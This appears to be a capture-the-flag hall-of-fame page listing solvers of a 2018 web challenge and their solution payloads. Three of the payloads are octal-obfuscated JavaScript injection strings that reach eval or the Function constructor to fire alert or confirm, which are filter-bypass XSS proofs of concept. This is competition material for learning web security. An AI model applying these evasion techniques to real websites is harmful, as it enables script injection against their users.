I. HOF
----------------------------------------
Name		Time
----------------------------------------
tinduong	00:30 pm GMT+7 17/3/2018
LittleMonkey	11:43 pm GMT+7 17/3/2018
ducnt		02:04 pm GMT+7 18/3/2018
kad96		02:59 pm GMT+7 18/3/2018


II. Solution
----------------------------------------
Name		Payload
----------------------------------------
tinduong	Point out the shit in my chall (fixed)
LittleMonkey	'||$['\147\154\157\142\141\154\105\166\141\154']('\141\154\145\162\164\50\61\51')||'
ducnt		1'?[]['\155\141\160']['\143\157\156\163\164\162\165\143\164\157\162']('\143\157\156\146\151\162\155\50\61\51')():'#
kad96		',[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\145\166\141\154')()('\141\154\145\162\164(1)'),'